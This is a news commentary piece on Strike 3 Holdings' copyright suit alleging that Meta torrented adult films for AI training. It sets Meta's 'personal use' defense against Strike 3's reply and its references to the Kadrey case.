Strike 3 Fires Back, Dismissing Meta’s “Personal Use” Claim in AI Battle

There’s a strange kind of déjà vu when a major tech company gets accused of dipping into the piracy pool — that uneasy feeling like we’ve been here before, even though each case somehow feels bigger than the last. That’s the energy swirling around the latest clash between Vixen Media Group owner Strike 3 Holdings and Meta, after Meta asked a federal judge in Northern California to toss their lawsuit.

Strike 3 didn’t pull any punches in its original complaint. They say Meta didn’t just accidentally stumble across their movies online — they accuse the company of deliberately scooping up VMG content from pirate sites to help train its AI systems. And they’re specific about it. BitTorrent, they say, is where those downloads came from. It’s the kind of accusation that makes you imagine a massive tech company hunched over a torrent client, pretending to be invisible.

Meta’s response in October? A very different story — one that almost sounds like a shrug. They told the court that if videos were downloaded, the timing and the number of those downloads “point solely to personal use, not AI training.” And then came the eyebrow-raising line:

“Meta contractors, visitors, or employees may have used Meta’s internet access over the years to download videos for personal use.”

In other words: Hey, people do stuff on our Wi-Fi. Not our problem.

Meta insisted the download activity — the volume, the pattern — just didn’t look like anything tied to large-scale AI development and “is plainly indicative of private personal use.”

They also brushed aside Strike 3’s attempt to link non-Meta IP addresses to the company, calling it a stretch.

Strike 3 fired back this week, and you can almost hear the disbelief between the lines. Their response to the “employees were just downloading porn” defense was blunt:

“Meta’s excuse that employees must be infringing Plaintiffs’ copyrights for ‘personal use’ does not fit the facts.”

What they say does fit the facts?

Something far more coordinated — something algorithmic. They point to what they call “unique patterns of Meta’s piracy,” arguing those patterns don’t look like a person casually searching for adult videos. Instead, Strike 3 claims the behavior “not only indicate[s] the use of a universal ‘script’ (likely developed, supplied, or encouraged by Meta), but also show[s] that the BitTorrent downloads are ‘for AI training data and not for personal use.’”

They bolster that argument with another recent copyright case: Kadrey v. Meta Platforms, Inc.

In that suit, Meta “admitted to using BitTorrent to obtain digital copies” of books for AI training — and Strike 3 alleges that the same IP addresses used in the book-related downloads also appear in their own infringement logs. According to them, Meta even acknowledged in that case that it masked its corporate IPs to avoid detection.

And then comes one of the more striking accusations (no pun intended):

“Plaintiffs were able to correlate Meta’s infringement through its Corporate IPs to six hidden data centers that were used to engage in massive infringement of both Plaintiffs’ and the Kadrey plaintiffs’ works as well. The scale of these infringements is staggering and are ‘beyond what a human could consume.’”

Strike 3 says activity from those masked IP addresses mirrors the activity from Meta’s known corporate IP blocks — a kind of digital fingerprinting that, in their telling, points to one conclusion: these downloads were never about personal viewing habits. “Those ends,” they write, “were to train Meta’s AI and not for the personal use of its employees.”

And if the court believes that interpretation?

Meta wouldn’t just be facing another infringement spat. The numbers involved are enormous — the complaint lists at least 2,396 allegedly infringed movies. Multiply that by the maximum statutory damages of $150,000 per work, and you land at a number that barely feels real: $359.4 million.

But the money, oddly enough, may not be the part that echoes the loudest. This lawsuit drops the adult industry directly into the center of the broader fight over whether training an AI model on copyrighted material counts as “fair use” — or whether it’s just a slicker version of old-school piracy wearing a futuristic badge.

No one really knows yet how courts will treat AI training that leans on protected works. Everyone’s waiting for the first big ruling — the one that will set the tone for all the cases piling up behind it. And maybe that’s the real story here: not just whether Meta downloaded some videos, but whether we’re watching the early days of a legal shift that’s going to redraw the boundaries of ownership, creativity, and machine learning.

Because if AI is the future, then this messy, uncomfortable question is coming along for the ride whether Silicon Valley likes it or not.

Read More »